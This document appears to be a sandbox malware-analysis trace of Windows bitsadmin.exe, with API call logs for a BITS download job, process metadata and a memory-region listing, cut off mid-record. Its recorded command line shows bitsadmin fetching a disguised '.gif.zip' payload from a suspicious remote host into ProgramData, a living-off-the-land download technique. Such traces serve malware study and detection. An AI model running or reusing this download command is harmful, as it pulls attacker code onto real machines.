[0064.300] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4343c4*, nNumberOfCharsToWrite=0xf, lpNumberOfCharsWritten=0x1ef3e8, lpReserved=0x0 | out: lpBuffer=0x4343c4*, lpNumberOfCharsWritten=0x1ef3e8*=0xf) returned 1
[0064.300] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0064.300] _vsnwprintf (in: _Buffer=0x1ef1fc, _BufferCount=0xfe, _Format="%.2f B/S", _ArgList=0x1ef1c0 | out: _Buffer="0.00 B/S") returned 8
[0064.300] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ef414 | out: lpConsoleScreenBufferInfo=0x1ef414) returned 1
[0064.300] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4343c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x1ef42c, lpReserved=0x0 | out: lpBuffer=0x4343c4*, lpNumberOfCharsWritten=0x1ef42c*=0x8) returned 1
[0064.300] CoTaskMemFree (pv=0x5f8388)
[0064.301] PeekMessageW (in: lpMsg=0x1efd88, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x1efd88) returned 0
[0064.301] MsgWaitForMultipleObjectsEx (nCount=0x1, pHandles=0x1efdb0*=0x3, dwMilliseconds=0xffffffff, dwWakeMask=0x4ff, dwFlags=0x2) returned 0x1
[0064.456] PeekMessageW (in: lpMsg=0x1efd88, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x1efd88) returned 1
[0064.456] TranslateMessage (lpMsg=0x1efd88) returned 0
[0064.456] DispatchMessageW (lpMsg=0x1efd88) returned 0x1
[0064.456] IBackgroundCopyCallback:JobModification (This=0x600c68, pJob=0x5ea6a4, dwReserved=0x0) returned 0x0
[0064.456] IBackgroundCopyJob:GetState (in: This=0x5ea614, pVal=0x600c74 | out: pVal=0x600c74) returned 0x0
[0064.469] SetTimer (hWnd=0x0, nIDEvent=0x0, uElapse=0x3e8, lpTimerFunc=0x0) returned 0x7fc7
[0064.470] IBackgroundCopyJob:GetType (in: This=0x5ea614, pVal=0x1ef450 | out: pVal=0x1ef450) returned 0x0
[0064.470] IBackgroundCopyCallback:JobModification (This=0x600c68, pJob=0x5ea6a4, dwReserved=0x0) returned 0x0
[0064.470] IBackgroundCopyJob:GetState (in: This=0x5ea614, pVal=0x600c74 | out: pVal=0x600c74) returned 0x0
[0064.471] IBackgroundCopyJob:GetProgress (in: This=0x5ea614, pVal=0x600c78 | out: pVal=0x600c78) returned 0x0
[0064.472] IBackgroundCopyJob:GetPriority (in: This=0x5ea614, pVal=0x1ef44c | out: pVal=0x1ef44c) returned 0x0
[0064.473] CoTaskMemFree (pv=0x0)
[0064.473] IBackgroundCopyJob:GetDisplayName (in: This=0x5ea614, pVal=0x1ef464 | out: pVal=0x1ef464*="msd5") returned 0x0
[0064.473] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ef40c | out: lpConsoleScreenBufferInfo=0x1ef40c) returned 1
[0064.473] FillConsoleOutputCharacterW (in: hConsoleOutput=0x7, cCharacter=0x20, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfCharsWritten=0x1ef424 | out: lpNumberOfCharsWritten=0x1ef424) returned 1
[0064.474] FillConsoleOutputAttribute (in: hConsoleOutput=0x7, wAttribute=0x7, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfAttrsWritten=0x1ef424 | out: lpNumberOfAttrsWritten=0x1ef424) returned 1
[0064.474] SetConsoleCursorPosition (hConsoleOutput=0x7, dwCursorPosition=0x0) returned 1
[0064.474] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0064.474] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ef3f8 | out: lpConsoleScreenBufferInfo=0x1ef3f8) returned 1
[0064.475] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4343c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x1ef410, lpReserved=0x0 | out: lpBuffer=0x4343c4*, lpNumberOfCharsWritten=0x1ef410*=0xa) returned 1
[0064.475] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0064.475] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ef3f4 | out: lpConsoleScreenBufferInfo=0x1ef3f4) returned 1
[0064.475] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4343c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x1ef40c, lpReserved=0x0 | out: lpBuffer=0x4343c4*, lpNumberOfCharsWritten=0x1ef40c*=0x5) returned 1
[0064.476] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0064.476] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ef3fc | out: lpConsoleScreenBufferInfo=0x1ef3fc) returned 1
[0064.476] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4343c4*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x1ef414, lpReserved=0x0 | out: lpBuffer=0x4343c4*, lpNumberOfCharsWritten=0x1ef414*=0x7) returned 1
[0064.476] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0064.477] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ef3f0 | out: lpConsoleScreenBufferInfo=0x1ef3f0) returned 1
[0064.477] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4343c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x1ef408, lpReserved=0x0 | out: lpBuffer=0x4343c4*, lpNumberOfCharsWritten=0x1ef408*=0x8) returned 1
[0064.477] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0064.477] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ef3f8 | out: lpConsoleScreenBufferInfo=0x1ef3f8) returned 1
[0064.477] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4343c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x1ef410, lpReserved=0x0 | out: lpBuffer=0x4343c4*, lpNumberOfCharsWritten=0x1ef410*=0x8) returned 1
[0064.478] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0064.478] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ef3ec | out: lpConsoleScreenBufferInfo=0x1ef3ec) returned 1
[0064.478] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4343c4*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x1ef404, lpReserved=0x0 | out: lpBuffer=0x4343c4*, lpNumberOfCharsWritten=0x1ef404*=0xc) returned 1
[0064.478] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0064.478] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ef3fc | out: lpConsoleScreenBufferInfo=0x1ef3fc) returned 1
[0064.479] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4343c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x1ef414, lpReserved=0x0 | out: lpBuffer=0x4343c4*, lpNumberOfCharsWritten=0x1ef414*=0xa) returned 1
[0064.479] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0064.479] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ef3e4 | out: lpConsoleScreenBufferInfo=0x1ef3e4) returned 1
[0064.479] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4343c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x1ef3fc, lpReserved=0x0 | out: lpBuffer=0x4343c4*, lpNumberOfCharsWritten=0x1ef3fc*=0xa) returned 1
[0064.479] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0064.480] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ef3ec | out: lpConsoleScreenBufferInfo=0x1ef3ec) returned 1
[0064.480] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4343c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x1ef404, lpReserved=0x0 | out: lpBuffer=0x4343c4*, lpNumberOfCharsWritten=0x1ef404*=0x8) returned 1
[0064.480] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0064.480] _vsnwprintf (in: _Buffer=0x4403f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x1ef410 | out: _Buffer="0") returned 1
[0064.480] _vsnwprintf (in: _Buffer=0x4403f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x1ef41c | out: _Buffer="1") returned 1
[0064.480] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ef3ec | out: lpConsoleScreenBufferInfo=0x1ef3ec) returned 1
[0064.480] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4343c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x1ef404, lpReserved=0x0 | out: lpBuffer=0x4343c4*, lpNumberOfCharsWritten=0x1ef404*=0x5) returned 1
[0064.481] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0064.481] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ef3f4 | out: lpConsoleScreenBufferInfo=0x1ef3f4) returned 1
[0064.481] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4343c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x1ef40c, lpReserved=0x0 | out: lpBuffer=0x4343c4*, lpNumberOfCharsWritten=0x1ef40c*=0x8) returned 1
[0064.481] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0064.481] _vsnwprintf (in: _Buffer=0x4403f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x1ef418 | out: _Buffer="0") returned 1
[0064.481] _vsnwprintf (in: _Buffer=0x4403f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x1ef41c | out: _Buffer="238080") returned 6
[0064.482] _vsnwprintf (in: _Buffer=0x4403f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x1ef418 | out: _Buffer="0") returned 1
[0064.482] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1ef404 | out: lpSystemTimeAsFileTime=0x1ef404*(dwLowDateTime=0xd718bcb0, dwHighDateTime=0x1d469c7))
[0064.482] _finite (_X=0x0) returned 1
[0064.482] _finite (_X=0x0) returned 1
[0064.482] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ef3c4 | out: lpConsoleScreenBufferInfo=0x1ef3c4) returned 1
[0064.482] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4343c4*, nNumberOfCharsToWrite=0x11, lpNumberOfCharsWritten=0x1ef3dc, lpReserved=0x0 | out: lpBuffer=0x4343c4*, lpNumberOfCharsWritten=0x1ef3dc*=0x11) returned 1
[0064.482] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0064.483] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ef3d0 | out: lpConsoleScreenBufferInfo=0x1ef3d0) returned 1
[0064.483] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4343c4*, nNumberOfCharsToWrite=0xf, lpNumberOfCharsWritten=0x1ef3e8, lpReserved=0x0 | out: lpBuffer=0x4343c4*, lpNumberOfCharsWritten=0x1ef3e8*=0xf) returned 1
[0064.483] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0064.483] _vsnwprintf (in: _Buffer=0x1ef1fc, _BufferCount=0xfe, _Format="%.2f B/S", _ArgList=0x1ef1c0 | out: _Buffer="0.00 B/S") returned 8
[0064.483] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ef414 | out: lpConsoleScreenBufferInfo=0x1ef414) returned 1
[0064.488] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4343c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x1ef42c, lpReserved=0x0 | out: lpBuffer=0x4343c4*, lpNumberOfCharsWritten=0x1ef42c*=0x8) returned 1
[0064.488] CoTaskMemFree (pv=0x5f83b0)
[0064.489] PeekMessageW (in: lpMsg=0x1efd88, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x1efd88) returned 0
[0064.489] MsgWaitForMultipleObjectsEx (nCount=0x1, pHandles=0x1efdb0*=0x3, dwMilliseconds=0xffffffff, dwWakeMask=0x4ff, dwFlags=0x2) returned 0x1
[0064.882] PeekMessageW (in: lpMsg=0x1efd88, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x1efd88) returned 1
[0064.882] TranslateMessage (lpMsg=0x1efd88) returned 0
[0064.882] DispatchMessageW (lpMsg=0x1efd88) returned 0x1
[0064.882] IBackgroundCopyCallback:JobTransferred (This=0x600c68, pJob=0x5ea6a4) returned 0x0
[0064.882] KillTimer (hWnd=0x0, uIDEvent=0x7fc7) returned 1
[0064.882] IBackgroundCopyJob:GetState (in: This=0x5ea614, pVal=0x600c74 | out: pVal=0x600c74) returned 0x0
[0064.883] IBackgroundCopyCallback:JobModification (This=0x600c68, pJob=0x5ea6a4, dwReserved=0x0) returned 0x0
[0064.883] IBackgroundCopyJob:GetState (in: This=0x5ea614, pVal=0x600c74 | out: pVal=0x600c74) returned 0x0
[0064.884] IBackgroundCopyJob:GetType (in: This=0x5ea614, pVal=0x1ee3c0 | out: pVal=0x1ee3c0) returned 0x0
[0064.885] IBackgroundCopyJob:GetProgress (in: This=0x5ea614, pVal=0x600c78 | out: pVal=0x600c78) returned 0x0
[0064.886] IBackgroundCopyJob:GetPriority (in: This=0x5ea614, pVal=0x1ee3bc | out: pVal=0x1ee3bc) returned 0x0
[0064.886] CoTaskMemFree (pv=0x0)
[0064.886] IBackgroundCopyJob:GetDisplayName (in: This=0x5ea614, pVal=0x1ee3d4 | out: pVal=0x1ee3d4*="msd5") returned 0x0
[0064.887] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ee37c | out: lpConsoleScreenBufferInfo=0x1ee37c) returned 1
[0064.887] FillConsoleOutputCharacterW (in: hConsoleOutput=0x7, cCharacter=0x20, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfCharsWritten=0x1ee394 | out: lpNumberOfCharsWritten=0x1ee394) returned 1
[0064.888] FillConsoleOutputAttribute (in: hConsoleOutput=0x7, wAttribute=0x7, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfAttrsWritten=0x1ee394 | out: lpNumberOfAttrsWritten=0x1ee394) returned 1
[0064.888] SetConsoleCursorPosition (hConsoleOutput=0x7, dwCursorPosition=0x0) returned 1
[0064.888] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0064.888] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ee368 | out: lpConsoleScreenBufferInfo=0x1ee368) returned 1
[0064.889] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4343c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x1ee380, lpReserved=0x0 | out: lpBuffer=0x4343c4*, lpNumberOfCharsWritten=0x1ee380*=0xa) returned 1
[0064.889] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0064.889] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ee364 | out: lpConsoleScreenBufferInfo=0x1ee364) returned 1
[0064.889] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4343c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x1ee37c, lpReserved=0x0 | out: lpBuffer=0x4343c4*, lpNumberOfCharsWritten=0x1ee37c*=0x5) returned 1
[0064.889] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0064.890] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ee36c | out: lpConsoleScreenBufferInfo=0x1ee36c) returned 1
[0064.890] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4343c4*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x1ee384, lpReserved=0x0 | out: lpBuffer=0x4343c4*, lpNumberOfCharsWritten=0x1ee384*=0x7) returned 1
[0064.890] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0064.890] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ee360 | out: lpConsoleScreenBufferInfo=0x1ee360) returned 1
[0064.890] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4343c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x1ee378, lpReserved=0x0 | out: lpBuffer=0x4343c4*, lpNumberOfCharsWritten=0x1ee378*=0x8) returned 1
[0064.891] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0064.891] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ee368 | out: lpConsoleScreenBufferInfo=0x1ee368) returned 1
[0064.891] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4343c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x1ee380, lpReserved=0x0 | out: lpBuffer=0x4343c4*, lpNumberOfCharsWritten=0x1ee380*=0x8) returned 1
[0064.891] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0064.891] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ee35c | out: lpConsoleScreenBufferInfo=0x1ee35c) returned 1
[0064.891] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4343c4*, nNumberOfCharsToWrite=0xd, lpNumberOfCharsWritten=0x1ee374, lpReserved=0x0 | out: lpBuffer=0x4343c4*, lpNumberOfCharsWritten=0x1ee374*=0xd) returned 1
[0064.892] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0064.892] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ee36c | out: lpConsoleScreenBufferInfo=0x1ee36c) returned 1
[0064.892] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4343c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x1ee384, lpReserved=0x0 | out: lpBuffer=0x4343c4*, lpNumberOfCharsWritten=0x1ee384*=0xa) returned 1
[0064.892] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0064.892] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ee354 | out: lpConsoleScreenBufferInfo=0x1ee354) returned 1
[0064.893] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4343c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x1ee36c, lpReserved=0x0 | out: lpBuffer=0x4343c4*, lpNumberOfCharsWritten=0x1ee36c*=0xa) returned 1
[0064.893] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0064.893] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ee35c | out: lpConsoleScreenBufferInfo=0x1ee35c) returned 1
[0064.893] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4343c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x1ee374, lpReserved=0x0 | out: lpBuffer=0x4343c4*, lpNumberOfCharsWritten=0x1ee374*=0x8) returned 1
[0064.893] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0064.893] _vsnwprintf (in: _Buffer=0x4403f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x1ee380 | out: _Buffer="1") returned 1
[0064.893] _vsnwprintf (in: _Buffer=0x4403f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x1ee38c | out: _Buffer="1") returned 1
[0064.893] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ee35c | out: lpConsoleScreenBufferInfo=0x1ee35c) returned 1
[0064.894] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4343c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x1ee374, lpReserved=0x0 | out: lpBuffer=0x4343c4*, lpNumberOfCharsWritten=0x1ee374*=0x5) returned 1
[0064.894] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0064.894] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ee364 | out: lpConsoleScreenBufferInfo=0x1ee364) returned 1
[0064.894] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4343c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x1ee37c, lpReserved=0x0 | out: lpBuffer=0x4343c4*, lpNumberOfCharsWritten=0x1ee37c*=0x8) returned 1
[0064.894] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0064.894] _vsnwprintf (in: _Buffer=0x4403f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x1ee388 | out: _Buffer="238080") returned 6
[0064.895] _vsnwprintf (in: _Buffer=0x4403f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x1ee38c | out: _Buffer="238080") returned 6
[0064.895] _vsnwprintf (in: _Buffer=0x4403f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x1ee388 | out: _Buffer="100") returned 3
[0064.895] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ee384 | out: lpConsoleScreenBufferInfo=0x1ee384) returned 1
[0064.895] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4343c4*, nNumberOfCharsToWrite=0x16, lpNumberOfCharsWritten=0x1ee39c, lpReserved=0x0 | out: lpBuffer=0x4343c4*, lpNumberOfCharsWritten=0x1ee39c*=0x16) returned 1
[0064.895] CoTaskMemFree (pv=0x5f83b0)
[0064.895] IBackgroundCopyJob:Complete (This=0x5ea614) returned 0x0
[0064.917] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ee388 | out: lpConsoleScreenBufferInfo=0x1ee388) returned 1
[0064.918] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ee35c | out: lpConsoleScreenBufferInfo=0x1ee35c) returned 1
[0064.918] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4343c4*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1ee374, lpReserved=0x0 | out: lpBuffer=0x4343c4*, lpNumberOfCharsWritten=0x1ee374*=0x2) returned 1
[0064.918] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ee35c | out: lpConsoleScreenBufferInfo=0x1ee35c) returned 1
[0064.918] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4343c4*, nNumberOfCharsToWrite=0x14, lpNumberOfCharsWritten=0x1ee374, lpReserved=0x0 | out: lpBuffer=0x4343c4*, lpNumberOfCharsWritten=0x1ee374*=0x14) returned 1
[0064.918] GetCurrentThreadId () returned 0xbac
[0064.918] PostThreadMessageW (idThread=0xbac, Msg=0x401, wParam=0x0, lParam=0x0) returned 1
[0064.919] PeekMessageW (in: lpMsg=0x1efd88, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x1efd88) returned 1
[0064.919] IUnknown:Release (This=0x5ea614) returned 0x1
[0064.919] IUnknown:Release (This=0x5ea53c) returned 0x0
[0064.919] CoUninitialize ()
[0064.921] IUnknown:Release (This=0x600c68) returned 0x2
[0064.921] IUnknown:Release (This=0x600c68) returned 0x1
[0064.921] IUnknown:Release (This=0x600c68) returned 0x0
[0064.921] IUnknown:Release (This=0x5ea614) returned 0x0
[0064.921] CoTaskMemFree (pv=0x600c68)
[0064.922] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0064.922] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1b7) returned 1
[0064.923] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0064.923] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0064.923] CloseHandle (hObject=0x80) returned 1
[0064.923] exit (_Code=0)
Thread:
id = 124
os_tid = 0xbc0
Thread:
id = 125
os_tid = 0xbc4
Thread:
id = 126
os_tid = 0xbc8
Thread:
id = 127
os_tid = 0xbcc
Process:
id = "10"
image_name = "bitsadmin.exe"
filename = "c:\\windows\\system32\\bitsadmin.exe"
page_root = "0x7f1be3a0"
os_pid = "0xbd8"
os_integrity_level = "0x3000"
os_privileges = "0x60800000"
monitor_reason = "child_process"
parent_id = "6"
os_parent_pid = "0xa98"
cmd_line = "\"C:\\Windows\\System32\\bitsadmin.exe\" /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmdwwn.gif.zip?918109560 C:\\ProgramData\\tempa\\marxvxinhhmdwwn.gif"
cur_dir = "C:\\Windows\\system32\\"
os_username = "CRH2YWU7\\EEBsYm5"
os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ed0e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 1285
start_va = 0x10000
end_va = 0x2ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 1286
start_va = 0x30000
end_va = 0x33fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 1287
start_va = 0x40000
end_va = 0x40fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 1288
start_va = 0x130000
end_va = 0x16ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000130000"
filename = ""
Region:
id = 1289
start_va = 0x4d0000
end_va = 0x513fff
entry_point = 0x4d0000
region_type = mapped_file
name = "bitsadmin.exe"
filename = "\\Windows\\System32\\bitsadmin.exe" (normalized: "c:\\windows\\system32\\bitsadmin.exe")
Region:
id = 1290
start_va = 0x76f20000
end_va = 0x7705bfff
entry_point = 0x76f20000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 1291
start_va = 0x77160000
end_va = 0x77160fff
entry_point = 0x77160000
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 1292
start_va = 0x7ffb0000
end_va = 0x7ffd2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007ffb0000"
filename = ""
Region:
id = 1293
start_va = 0x7ffde000
end_va = 0x7ffdefff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffde000"
filename = ""
Region:
id = 1294
start_va = 0x7ffdf000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdf000"
filename = ""
Region:
id = 1295
start_va = 0x10000
end_va = 0x1ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 1296
start_va = 0x20000
end_va = 0x2ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 1297
start_va = 0x50000
end_va = 0xb6fff
entry_point = 0x50000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 1298
start_va = 0x230000
end_va = 0x32ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000230000"
filename = ""
Region:
id = 1299
start_va = 0x330000
end_va = 0x3f7fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000330000"
filename = ""
Region:
id = 1300
start_va = 0x6f0000
end_va = 0x6fffff
entry_point = 0x0
region_type = private
name = "private_0x00000000006f0000"
filename = ""
Region:
id = 1301
start_va = 0x745c0000
